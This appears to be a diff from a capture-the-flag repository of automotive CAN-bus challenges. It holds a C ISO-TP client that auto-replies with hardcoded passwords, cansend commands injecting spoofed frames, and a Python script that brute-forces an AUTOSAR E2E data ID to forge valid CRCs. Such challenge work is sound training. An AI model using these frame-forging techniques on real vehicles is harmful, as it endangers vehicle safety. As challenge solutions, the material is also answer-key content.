FD_SET(STDIN_FILENO, &readfds);
FD_SET(sc, &readfds);
ret = select(sc + 1, &readfds, NULL, NULL, NULL);
if (ret < 0) {
perror("select");
goto exit;
}
if (FD_ISSET(sc, &readfds)) {
nbytes = read(sc, rxmsg, MAX_PDU_LENGTH - 1);
if (nbytes < 1) {
perror("read from isotp socket");
ret = nbytes;
goto exit;
}
rxmsg[nbytes] = 0; /* terminate string */
printf("%s", rxmsg);
if(strncmp(rxmsg, "\nwopr", 4)==0){
send(sc, "falken\n", 7 , 0);
}
if(strncmp(rxmsg, "pass", 4)==0){
send(sc, "Joshua\n", 7 , 0);
}
char *s = strstr(rxmsg, "Test#");
char c;
int j = 0;
if(s){
printf("detected: %c\n", s[18]);
c = s[18];
while(s[0] != '\n')
s++;
s = strstr(rxmsg, "\n'");
for(int i=0; i<strlen(s); i++)
if(s[i] == c)
j++;
char msg[10];
sprintf(msg, "%d\n", j);
printf("aswering: %d\n", j);
send(sc, msg, strlen(msg)+1, 0);
}
fflush(stdout);
} else if (FD_ISSET(STDIN_FILENO, &readfds)) {
fgetsret = fgets(txmsg, MAX_PDU_LENGTH, stdin);
if (fgetsret == NULL) {
ret = 0;
goto exit;
}
nbytes = send(sc, txmsg, strlen(txmsg) + 1, 0);
if (nbytes != strlen(txmsg) + 1) {
perror("write to isotp socket");
ret = nbytes;
goto exit;
}
}
}
exit:
close(sc);
return ret;
}

1
6/CANstrument1 Normal file
View File

@@ -0,0 +1 @@
cansend cluster0 100#0000C8

1
6/CANstrument2 Normal file
View File

@@ -0,0 +1 @@
cansend cluster1 100#D300C80000000000

5
6/CANstrument3/test Normal file
View File

@@ -0,0 +1,5 @@
e2e profile2
dataID for counter=0x0b is 0xd2
calculate new crc for payload from previous task
cansend cluster2 100#6f0bc80000000000

27
6/CANstrument3/test.py Normal file
View File

@@ -0,0 +1,27 @@
import e2e
#cansend cluster1 100#D300C80000000000
#b = bytearray(b"\x01\x00\x07\xAD\x07\x62\x08\x71\x62")
#b = bytearray(b"\x00\x00\x00\x00\x00\x00\x00\x00")
#b = bytearray(b"\x00\x00\x00\xB9\xE6\x6B\x06\x00")
b = bytearray(b"\x00\x0B\x10\x15\xC3\x2A\x4A\x00")
#for i in range(0,255):
# b[0] = i
# print(hex(i), end='')
# print(" ", end='')
#crc: int = e2e.crc.calculate_crc8_h2f(b)
for i in range(0,255):
print(hex(i), end='')
print(" ", end='')
e2e.p02.e2e_p02_protect(b, 7, bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, i, 0x0d, 0x0e, 0x0f, 0x10]), increment_counter=False)
print(b.hex())
#b = bytearray(b"\x00\x0B\x10\x15\xC3\x2A\x4A\x00")
e2e.p02.e2e_p02_protect(b, 7, bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0xd2, 0x0d, 0x0e, 0x0f, 0x10]), increment_counter=False)
print(b.hex())
b = bytearray(b"\x00\x0B\xC8\x00\x00\x00\x00\x00")
e2e.p02.e2e_p02_protect(b, 7, bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0xd2, 0x0d, 0x0e, 0x0f, 0x10]), increment_counter=False)
print(b.hex())